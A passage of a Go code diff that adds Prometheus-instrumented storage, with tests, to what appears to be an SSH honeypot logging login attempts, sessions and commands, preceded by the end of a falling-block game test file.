m, _ := newTestModel(t)
|
||||||
|
sendKey(m, "enter") // start game
|
||||||
|
|
||||||
|
// Build a ledge: fill rows 18-19 but leave column 0 empty.
|
||||||
|
for r := boardRows - 2; r < boardRows; r++ {
|
||||||
|
for c := 1; c < boardCols; c++ {
|
||||||
|
m.game.board[r][c] = cell{filled: true, piece: pieceI}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Move piece to column 0 area and drop it onto the ledge.
|
||||||
|
for range boardCols {
|
||||||
|
m.game.moveLeft()
|
||||||
|
}
|
||||||
|
// Tick down until locking.
|
||||||
|
for range boardRows + 5 {
|
||||||
|
if m.locking {
|
||||||
|
break
|
||||||
|
}
|
||||||
|
sendTick(m)
|
||||||
|
}
|
||||||
|
|
||||||
|
// If piece is on the ledge and we slide it to col 0 (open column),
|
||||||
|
// the lock delay should cancel since it can fall further.
|
||||||
|
// This test just validates the locking flag logic works.
|
||||||
|
if m.locking {
|
||||||
|
// Try moving — if piece can drop further, locking should cancel.
|
||||||
|
sendKey(m, "left")
|
||||||
|
// Whether locking cancels depends on the board state; just verify no crash.
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestSpawnCol(t *testing.T) {
|
||||||
|
// All pieces should spawn roughly centered.
|
||||||
|
for pt := range pieceType(numPieceTypes) {
|
||||||
|
col := spawnCol(pt, 0)
|
||||||
|
if col < 0 || col > boardCols-1 {
|
||||||
|
t.Errorf("spawnCol(%d, 0) = %d, out of range", pt, col)
|
||||||
|
}
|
||||||
|
// Verify piece fits at spawn position.
|
||||||
|
shape := pieces[pt][0]
|
||||||
|
for _, off := range shape {
|
||||||
|
c := col + off[1]
|
||||||
|
if c < 0 || c >= boardCols {
|
||||||
|
t.Errorf("piece %d overflows board at spawn: col+offset = %d", pt, c)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
217
internal/storage/instrumented.go
Normal file
217
internal/storage/instrumented.go
Normal file
@@ -0,0 +1,217 @@
|
|||||||
|
package storage
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"github.com/prometheus/client_golang/prometheus"
|
||||||
|
)
|
||||||
|
|
||||||
|
// InstrumentedStore wraps a Store and records query duration and errors
|
||||||
|
// as Prometheus metrics for each method call.
|
||||||
|
type InstrumentedStore struct {
|
||||||
|
store Store
|
||||||
|
queryDuration *prometheus.HistogramVec
|
||||||
|
queryErrors *prometheus.CounterVec
|
||||||
|
}
|
||||||
|
|
||||||
|
// NewInstrumentedStore returns a new InstrumentedStore wrapping the given store.
|
||||||
|
func NewInstrumentedStore(store Store, queryDuration *prometheus.HistogramVec, queryErrors *prometheus.CounterVec) *InstrumentedStore {
|
||||||
|
return &InstrumentedStore{
|
||||||
|
store: store,
|
||||||
|
queryDuration: queryDuration,
|
||||||
|
queryErrors: queryErrors,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func observe[T any](s *InstrumentedStore, method string, fn func() (T, error)) (T, error) {
|
||||||
|
timer := prometheus.NewTimer(s.queryDuration.WithLabelValues(method))
|
||||||
|
v, err := fn()
|
||||||
|
timer.ObserveDuration()
|
||||||
|
if err != nil {
|
||||||
|
s.queryErrors.WithLabelValues(method).Inc()
|
||||||
|
}
|
||||||
|
return v, err
|
||||||
|
}
|
||||||
|
|
||||||
|
func observeErr(s *InstrumentedStore, method string, fn func() error) error {
|
||||||
|
timer := prometheus.NewTimer(s.queryDuration.WithLabelValues(method))
|
||||||
|
err := fn()
|
||||||
|
timer.ObserveDuration()
|
||||||
|
if err != nil {
|
||||||
|
s.queryErrors.WithLabelValues(method).Inc()
|
||||||
|
}
|
||||||
|
return err
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) RecordLoginAttempt(ctx context.Context, username, password, ip, country string) error {
|
||||||
|
return observeErr(s, "RecordLoginAttempt", func() error {
|
||||||
|
return s.store.RecordLoginAttempt(ctx, username, password, ip, country)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) CreateSession(ctx context.Context, ip, username, shellName, country string) (string, error) {
|
||||||
|
return observe(s, "CreateSession", func() (string, error) {
|
||||||
|
return s.store.CreateSession(ctx, ip, username, shellName, country)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) EndSession(ctx context.Context, sessionID string, disconnectedAt time.Time) error {
|
||||||
|
return observeErr(s, "EndSession", func() error {
|
||||||
|
return s.store.EndSession(ctx, sessionID, disconnectedAt)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) UpdateHumanScore(ctx context.Context, sessionID string, score float64) error {
|
||||||
|
return observeErr(s, "UpdateHumanScore", func() error {
|
||||||
|
return s.store.UpdateHumanScore(ctx, sessionID, score)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) SetExecCommand(ctx context.Context, sessionID string, command string) error {
|
||||||
|
return observeErr(s, "SetExecCommand", func() error {
|
||||||
|
return s.store.SetExecCommand(ctx, sessionID, command)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) AppendSessionLog(ctx context.Context, sessionID, input, output string) error {
|
||||||
|
return observeErr(s, "AppendSessionLog", func() error {
|
||||||
|
return s.store.AppendSessionLog(ctx, sessionID, input, output)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) DeleteRecordsBefore(ctx context.Context, cutoff time.Time) (int64, error) {
|
||||||
|
return observe(s, "DeleteRecordsBefore", func() (int64, error) {
|
||||||
|
return s.store.DeleteRecordsBefore(ctx, cutoff)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) GetDashboardStats(ctx context.Context) (*DashboardStats, error) {
|
||||||
|
return observe(s, "GetDashboardStats", func() (*DashboardStats, error) {
|
||||||
|
return s.store.GetDashboardStats(ctx)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) GetTopUsernames(ctx context.Context, limit int) ([]TopEntry, error) {
|
||||||
|
return observe(s, "GetTopUsernames", func() ([]TopEntry, error) {
|
||||||
|
return s.store.GetTopUsernames(ctx, limit)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) GetTopPasswords(ctx context.Context, limit int) ([]TopEntry, error) {
|
||||||
|
return observe(s, "GetTopPasswords", func() ([]TopEntry, error) {
|
||||||
|
return s.store.GetTopPasswords(ctx, limit)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) GetTopIPs(ctx context.Context, limit int) ([]TopEntry, error) {
|
||||||
|
return observe(s, "GetTopIPs", func() ([]TopEntry, error) {
|
||||||
|
return s.store.GetTopIPs(ctx, limit)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) GetTopCountries(ctx context.Context, limit int) ([]TopEntry, error) {
|
||||||
|
return observe(s, "GetTopCountries", func() ([]TopEntry, error) {
|
||||||
|
return s.store.GetTopCountries(ctx, limit)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) GetTopExecCommands(ctx context.Context, limit int) ([]TopEntry, error) {
|
||||||
|
return observe(s, "GetTopExecCommands", func() ([]TopEntry, error) {
|
||||||
|
return s.store.GetTopExecCommands(ctx, limit)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) GetRecentSessions(ctx context.Context, limit int, activeOnly bool) ([]Session, error) {
|
||||||
|
return observe(s, "GetRecentSessions", func() ([]Session, error) {
|
||||||
|
return s.store.GetRecentSessions(ctx, limit, activeOnly)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) GetFilteredSessions(ctx context.Context, limit int, activeOnly bool, f DashboardFilter) ([]Session, error) {
|
||||||
|
return observe(s, "GetFilteredSessions", func() ([]Session, error) {
|
||||||
|
return s.store.GetFilteredSessions(ctx, limit, activeOnly, f)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) GetSession(ctx context.Context, sessionID string) (*Session, error) {
|
||||||
|
return observe(s, "GetSession", func() (*Session, error) {
|
||||||
|
return s.store.GetSession(ctx, sessionID)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) GetSessionLogs(ctx context.Context, sessionID string) ([]SessionLog, error) {
|
||||||
|
return observe(s, "GetSessionLogs", func() ([]SessionLog, error) {
|
||||||
|
return s.store.GetSessionLogs(ctx, sessionID)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) AppendSessionEvents(ctx context.Context, events []SessionEvent) error {
|
||||||
|
return observeErr(s, "AppendSessionEvents", func() error {
|
||||||
|
return s.store.AppendSessionEvents(ctx, events)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) GetSessionEvents(ctx context.Context, sessionID string) ([]SessionEvent, error) {
|
||||||
|
return observe(s, "GetSessionEvents", func() ([]SessionEvent, error) {
|
||||||
|
return s.store.GetSessionEvents(ctx, sessionID)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) CloseActiveSessions(ctx context.Context, disconnectedAt time.Time) (int64, error) {
|
||||||
|
return observe(s, "CloseActiveSessions", func() (int64, error) {
|
||||||
|
return s.store.CloseActiveSessions(ctx, disconnectedAt)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) GetAttemptsOverTime(ctx context.Context, days int, since, until *time.Time) ([]TimeSeriesPoint, error) {
|
||||||
|
return observe(s, "GetAttemptsOverTime", func() ([]TimeSeriesPoint, error) {
|
||||||
|
return s.store.GetAttemptsOverTime(ctx, days, since, until)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) GetHourlyPattern(ctx context.Context, since, until *time.Time) ([]HourlyCount, error) {
|
||||||
|
return observe(s, "GetHourlyPattern", func() ([]HourlyCount, error) {
|
||||||
|
return s.store.GetHourlyPattern(ctx, since, until)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) GetCountryStats(ctx context.Context) ([]CountryCount, error) {
|
||||||
|
return observe(s, "GetCountryStats", func() ([]CountryCount, error) {
|
||||||
|
return s.store.GetCountryStats(ctx)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) GetFilteredDashboardStats(ctx context.Context, f DashboardFilter) (*DashboardStats, error) {
|
||||||
|
return observe(s, "GetFilteredDashboardStats", func() (*DashboardStats, error) {
|
||||||
|
return s.store.GetFilteredDashboardStats(ctx, f)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) GetFilteredTopUsernames(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
|
||||||
|
return observe(s, "GetFilteredTopUsernames", func() ([]TopEntry, error) {
|
||||||
|
return s.store.GetFilteredTopUsernames(ctx, limit, f)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) GetFilteredTopPasswords(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
|
||||||
|
return observe(s, "GetFilteredTopPasswords", func() ([]TopEntry, error) {
|
||||||
|
return s.store.GetFilteredTopPasswords(ctx, limit, f)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) GetFilteredTopIPs(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
|
||||||
|
return observe(s, "GetFilteredTopIPs", func() ([]TopEntry, error) {
|
||||||
|
return s.store.GetFilteredTopIPs(ctx, limit, f)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) GetFilteredTopCountries(ctx context.Context, limit int, f DashboardFilter) ([]TopEntry, error) {
|
||||||
|
return observe(s, "GetFilteredTopCountries", func() ([]TopEntry, error) {
|
||||||
|
return s.store.GetFilteredTopCountries(ctx, limit, f)
|
||||||
|
})
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *InstrumentedStore) Close() error {
|
||||||
|
return s.store.Close()
|
||||||
|
}
|
||||||
163
internal/storage/instrumented_test.go
Normal file
163
internal/storage/instrumented_test.go
Normal file
@@ -0,0 +1,163 @@
|
|||||||
|
package storage
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"errors"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"github.com/prometheus/client_golang/prometheus"
|
||||||
|
dto "github.com/prometheus/client_model/go"
|
||||||
|
)
|
||||||
|
|
||||||
|
func newTestInstrumented() (*InstrumentedStore, *prometheus.HistogramVec, *prometheus.CounterVec) {
|
||||||
|
dur := prometheus.NewHistogramVec(prometheus.HistogramOpts{
|
||||||
|
Name: "test_query_duration_seconds",
|
||||||
|
Help: "test",
|
||||||
|
Buckets: []float64{0.001, 0.01, 0.1, 1},
|
||||||
|
}, []string{"method"})
|
||||||
|
errs := prometheus.NewCounterVec(prometheus.CounterOpts{
|
||||||
|
Name: "test_query_errors_total",
|
||||||
|
Help: "test",
|
||||||
|
}, []string{"method"})
|
||||||
|
|
||||||
|
store := NewMemoryStore()
|
||||||
|
return NewInstrumentedStore(store, dur, errs), dur, errs
|
||||||
|
}
|
||||||
|
|
||||||
|
func getHistogramCount(h *prometheus.HistogramVec, method string) uint64 {
|
||||||
|
m := &dto.Metric{}
|
||||||
|
h.WithLabelValues(method).(prometheus.Histogram).Write(m)
|
||||||
|
return m.GetHistogram().GetSampleCount()
|
||||||
|
}
|
||||||
|
|
||||||
|
func getCounterValue(c *prometheus.CounterVec, method string) float64 {
|
||||||
|
m := &dto.Metric{}
|
||||||
|
c.WithLabelValues(method).Write(m)
|
||||||
|
return m.GetCounter().GetValue()
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestInstrumentedStoreDelegation(t *testing.T) {
|
||||||
|
s, dur, _ := newTestInstrumented()
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
// RecordLoginAttempt should delegate and record duration.
|
||||||
|
err := s.RecordLoginAttempt(ctx, "root", "pass", "1.2.3.4", "US")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("RecordLoginAttempt: %v", err)
|
||||||
|
}
|
||||||
|
if c := getHistogramCount(dur, "RecordLoginAttempt"); c != 1 {
|
||||||
|
t.Fatalf("expected 1 observation, got %d", c)
|
||||||
|
}
|
||||||
|
|
||||||
|
// CreateSession should delegate and return a valid ID.
|
||||||
|
id, err := s.CreateSession(ctx, "1.2.3.4", "root", "bash", "US")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("CreateSession: %v", err)
|
||||||
|
}
|
||||||
|
if id == "" {
|
||||||
|
t.Fatal("CreateSession returned empty ID")
|
||||||
|
}
|
||||||
|
if c := getHistogramCount(dur, "CreateSession"); c != 1 {
|
||||||
|
t.Fatalf("expected 1 observation, got %d", c)
|
||||||
|
}
|
||||||
|
|
||||||
|
// GetDashboardStats should delegate.
|
||||||
|
stats, err := s.GetDashboardStats(ctx)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("GetDashboardStats: %v", err)
|
||||||
|
}
|
||||||
|
if stats == nil {
|
||||||
|
t.Fatal("GetDashboardStats returned nil")
|
||||||
|
}
|
||||||
|
if c := getHistogramCount(dur, "GetDashboardStats"); c != 1 {
|
||||||
|
t.Fatalf("expected 1 observation, got %d", c)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestInstrumentedStoreErrorCounting(t *testing.T) {
|
||||||
|
dur := prometheus.NewHistogramVec(prometheus.HistogramOpts{
|
||||||
|
Name: "test_ec_query_duration_seconds",
|
||||||
|
Help: "test",
|
||||||
|
Buckets: []float64{0.001, 0.01, 0.1, 1},
|
||||||
|
}, []string{"method"})
|
||||||
|
errs := prometheus.NewCounterVec(prometheus.CounterOpts{
|
||||||
|
Name: "test_ec_query_errors_total",
|
||||||
|
Help: "test",
|
||||||
|
}, []string{"method"})
|
||||||
|
|
||||||
|
es := &errorStore{}
|
||||||
|
s := NewInstrumentedStore(es, dur, errs)
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
// Error should be counted.
|
||||||
|
err := s.EndSession(ctx, "nonexistent", time.Now())
|
||||||
|
if !errors.Is(err, errFake) {
|
||||||
|
t.Fatalf("expected errFake, got %v", err)
|
||||||
|
}
|
||||||
|
if c := getHistogramCount(dur, "EndSession"); c != 1 {
|
||||||
|
t.Fatalf("expected 1 observation, got %d", c)
|
||||||
|
}
|
||||||
|
if c := getCounterValue(errs, "EndSession"); c != 1 {
|
||||||
|
t.Fatalf("expected error count 1, got %f", c)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Successful call should not increment error counter.
|
||||||
|
s2, _, errs2 := newTestInstrumented()
|
||||||
|
err = s2.RecordLoginAttempt(ctx, "root", "pass", "1.2.3.4", "US")
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("RecordLoginAttempt: %v", err)
|
||||||
|
}
|
||||||
|
if c := getCounterValue(errs2, "RecordLoginAttempt"); c != 0 {
|
||||||
|
t.Fatalf("expected error count 0, got %f", c)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// errorStore is a Store that returns errors for all methods.
|
||||||
|
type errorStore struct {
|
||||||
|
MemoryStore
|
||||||
|
}
|
||||||
|
|
||||||
|
var errFake = errors.New("fake error")
|
||||||
|
|
||||||
|
func (s *errorStore) RecordLoginAttempt(context.Context, string, string, string, string) error {
|
||||||
|
return errFake
|
||||||
|
}
|
||||||
|
|
||||||
|
func (s *errorStore) EndSession(context.Context, string, time.Time) error {
|
||||||
|
return errFake
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestInstrumentedStoreObserveErr(t *testing.T) {
|
||||||
|
dur := prometheus.NewHistogramVec(prometheus.HistogramOpts{
|
||||||
|
Name: "test2_query_duration_seconds",
|
||||||
|
Help: "test",
|
||||||
|
Buckets: []float64{0.001, 0.01, 0.1, 1},
|
||||||
|
}, []string{"method"})
|
||||||
|
errs := prometheus.NewCounterVec(prometheus.CounterOpts{
|
||||||
|
Name: "test2_query_errors_total",
|
||||||
|
Help: "test",
|
||||||
|
}, []string{"method"})
|
||||||
|
|
||||||
|
es := &errorStore{}
|
||||||
|
s := NewInstrumentedStore(es, dur, errs)
|
||||||
|
ctx := context.Background()
|
||||||
|
|
||||||
|
err := s.RecordLoginAttempt(ctx, "root", "pass", "1.2.3.4", "US")
|
||||||
|
if !errors.Is(err, errFake) {
|
||||||
|
t.Fatalf("expected errFake, got %v", err)
|
||||||
|
}
|
||||||
|
if c := getCounterValue(errs, "RecordLoginAttempt"); c != 1 {
|
||||||
|
t.Fatalf("expected error count 1, got %f", c)
|
||||||
|
}
|
||||||
|
if c := getHistogramCount(dur, "RecordLoginAttempt"); c != 1 {
|
||||||
|
t.Fatalf("expected 1 observation, got %d", c)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestInstrumentedStoreClose(t *testing.T) {
|
||||||
|
s, _, _ := newTestInstrumented()
|
||||||
|
if err := s.Close(); err != nil {
|
||||||
|
t.Fatalf("Close: %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -2,6 +2,7 @@ package storage
|
|||||||
|
|
||||||
import (
|
import (
|
||||||
"context"
|
"context"
|
||||||
|
"sort"
|
||||||
"sync"
|
"sync"
|
||||||
"time"
|
"time"
|
||||||
|
|
||||||
@@ -14,6 +15,7 @@ type MemoryStore struct {
|
|||||||
LoginAttempts []LoginAttempt
|
LoginAttempts []LoginAttempt
|
||||||
Sessions map[string]*Session
|
Sessions map[string]*Session
|
||||||
SessionLogs []SessionLog
|
SessionLogs []SessionLog
|
||||||
|
SessionEvents []SessionEvent
|
||||||
}
|
}
|
||||||
|
|
||||||
// NewMemoryStore returns a new empty MemoryStore.
|
// NewMemoryStore returns a new empty MemoryStore.
|
||||||
@@ -23,7 +25,7 @@ func NewMemoryStore() *MemoryStore {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
func (m *MemoryStore) RecordLoginAttempt(_ context.Context, username, password, ip string) error {
|
func (m *MemoryStore) RecordLoginAttempt(_ context.Context, username, password, ip, country string) error {
|
||||||
m.mu.Lock()
|
m.mu.Lock()
|
||||||
defer m.mu.Unlock()
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
@@ -33,6 +35,7 @@ func (m *MemoryStore) RecordLoginAttempt(_ context.Context, username, password,
|
|||||||
if a.Username == username && a.Password == password && a.IP == ip {
|
if a.Username == username && a.Password == password && a.IP == ip {
|
||||||
a.Count++
|
a.Count++
|
||||||
a.LastSeen = now
|
a.LastSeen = now
|
||||||
|
a.Country = country
|
||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -42,6 +45,7 @@ func (m *MemoryStore) RecordLoginAttempt(_ context.Context, username, password,
|
|||||||
Username: username,
|
Username: username,
|
||||||
Password: password,
|
Password: password,
|
||||||
IP: ip,
|
IP: ip,
|
||||||
|
Country: country,
|
||||||
Count: 1,
|
Count: 1,
|
||||||
FirstSeen: now,
|
FirstSeen: now,
|
||||||
LastSeen: now,
|
LastSeen: now,
|
||||||
@@ -49,7 +53,7 @@ func (m *MemoryStore) RecordLoginAttempt(_ context.Context, username, password,
|
|||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
func (m *MemoryStore) CreateSession(_ context.Context, ip, username, shellName string) (string, error) {
|
func (m *MemoryStore) CreateSession(_ context.Context, ip, username, shellName, country string) (string, error) {
|
||||||
m.mu.Lock()
|
m.mu.Lock()
|
||||||
defer m.mu.Unlock()
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
@@ -58,6 +62,7 @@ func (m *MemoryStore) CreateSession(_ context.Context, ip, username, shellName s
|
|||||||
m.Sessions[id] = &Session{
|
m.Sessions[id] = &Session{
|
||||||
ID: id,
|
ID: id,
|
||||||
IP: ip,
|
IP: ip,
|
||||||
|
Country: country,
|
||||||
Username: username,
|
Username: username,
|
||||||
ShellName: shellName,
|
ShellName: shellName,
|
||||||
ConnectedAt: now,
|
ConnectedAt: now,
|
||||||
@@ -86,6 +91,16 @@ func (m *MemoryStore) UpdateHumanScore(_ context.Context, sessionID string, scor
|
|||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) SetExecCommand(_ context.Context, sessionID string, command string) error {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
|
if s, ok := m.Sessions[sessionID]; ok {
|
||||||
|
s.ExecCommand = &command
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
func (m *MemoryStore) AppendSessionLog(_ context.Context, sessionID, input, output string) error {
|
func (m *MemoryStore) AppendSessionLog(_ context.Context, sessionID, input, output string) error {
|
||||||
m.mu.Lock()
|
m.mu.Lock()
|
||||||
defer m.mu.Unlock()
|
defer m.mu.Unlock()
|
||||||
@@ -100,6 +115,55 @@ func (m *MemoryStore) AppendSessionLog(_ context.Context, sessionID, input, outp
|
|||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) GetSession(_ context.Context, sessionID string) (*Session, error) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
|
s, ok := m.Sessions[sessionID]
|
||||||
|
if !ok {
|
||||||
|
return nil, nil
|
||||||
|
}
|
||||||
|
copy := *s
|
||||||
|
return ©, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) GetSessionLogs(_ context.Context, sessionID string) ([]SessionLog, error) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
|
var logs []SessionLog
|
||||||
|
for _, l := range m.SessionLogs {
|
||||||
|
if l.SessionID == sessionID {
|
||||||
|
logs = append(logs, l)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
sort.Slice(logs, func(i, j int) bool {
|
||||||
|
return logs[i].Timestamp.Before(logs[j].Timestamp)
|
||||||
|
})
|
||||||
|
return logs, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) AppendSessionEvents(_ context.Context, events []SessionEvent) error {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
|
m.SessionEvents = append(m.SessionEvents, events...)
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) GetSessionEvents(_ context.Context, sessionID string) ([]SessionEvent, error) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
|
var events []SessionEvent
|
||||||
|
for _, e := range m.SessionEvents {
|
||||||
|
if e.SessionID == sessionID {
|
||||||
|
events = append(events, e)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return events, nil
|
||||||
|
}
|
||||||
|
|
||||||
func (m *MemoryStore) DeleteRecordsBefore(_ context.Context, cutoff time.Time) (int64, error) {
|
func (m *MemoryStore) DeleteRecordsBefore(_ context.Context, cutoff time.Time) (int64, error) {
|
||||||
m.mu.Lock()
|
m.mu.Lock()
|
||||||
defer m.mu.Unlock()
|
defer m.mu.Unlock()
|
||||||
@@ -135,9 +199,511 @@ func (m *MemoryStore) DeleteRecordsBefore(_ context.Context, cutoff time.Time) (
|
|||||||
}
|
}
|
||||||
m.SessionLogs = keptLogs
|
m.SessionLogs = keptLogs
|
||||||
|
|
||||||
|
keptEvents := m.SessionEvents[:0]
|
||||||
|
for _, e := range m.SessionEvents {
|
||||||
|
if _, ok := m.Sessions[e.SessionID]; ok {
|
||||||
|
keptEvents = append(keptEvents, e)
|
||||||
|
} else {
|
||||||
|
total++
|
||||||
|
}
|
||||||
|
}
|
||||||
|
m.SessionEvents = keptEvents
|
||||||
|
|
||||||
return total, nil
|
return total, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) GetDashboardStats(_ context.Context) (*DashboardStats, error) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
|
stats := &DashboardStats{}
|
||||||
|
ips := make(map[string]struct{})
|
||||||
|
for _, a := range m.LoginAttempts {
|
||||||
|
stats.TotalAttempts += int64(a.Count)
|
||||||
|
ips[a.IP] = struct{}{}
|
||||||
|
}
|
||||||
|
stats.UniqueIPs = int64(len(ips))
|
||||||
|
stats.TotalSessions = int64(len(m.Sessions))
|
||||||
|
for _, s := range m.Sessions {
|
||||||
|
if s.DisconnectedAt == nil {
|
||||||
|
stats.ActiveSessions++
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return stats, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) GetTopUsernames(_ context.Context, limit int) ([]TopEntry, error) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
return m.topN("username", limit), nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) GetTopPasswords(_ context.Context, limit int) ([]TopEntry, error) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
return m.topN("password", limit), nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) GetTopIPs(_ context.Context, limit int) ([]TopEntry, error) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
|
type ipInfo struct {
|
||||||
|
count int64
|
||||||
|
country string
|
||||||
|
}
|
||||||
|
agg := make(map[string]*ipInfo)
|
||||||
|
for _, a := range m.LoginAttempts {
|
||||||
|
info, ok := agg[a.IP]
|
||||||
|
if !ok {
|
||||||
|
info = &ipInfo{}
|
||||||
|
agg[a.IP] = info
|
||||||
|
}
|
||||||
|
info.count += int64(a.Count)
|
||||||
|
if a.Country != "" {
|
||||||
|
info.country = a.Country
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
entries := make([]TopEntry, 0, len(agg))
|
||||||
|
for ip, info := range agg {
|
||||||
|
entries = append(entries, TopEntry{Value: ip, Country: info.country, Count: info.count})
|
||||||
|
}
|
||||||
|
sort.Slice(entries, func(i, j int) bool {
|
||||||
|
return entries[i].Count > entries[j].Count
|
||||||
|
})
|
||||||
|
if limit > 0 && len(entries) > limit {
|
||||||
|
entries = entries[:limit]
|
||||||
|
}
|
||||||
|
return entries, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *MemoryStore) GetTopCountries(_ context.Context, limit int) ([]TopEntry, error) {
|
||||||
|
m.mu.Lock()
|
||||||
|
defer m.mu.Unlock()
|
||||||
|
|
||||||
|
counts := make(map[string]int64)
|
||||||
|
for _, a := range m.LoginAttempts {
|
||||||
|
if a.Country == "" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
counts[a.Country] += int64(a.Count)
|
||||||
|
}
|
||||||
|
|
||||||
|
entries := make([]TopEntry, 0, len(counts))
|
||||||
|
for k, v := range counts {
|
||||||
|
entries = append(entries, TopEntry{Value: k, Count: v})
|
||||||
|
}
|
||||||
|
sort.Slice(entries, func(i, j int) bool {
|
||||||
|
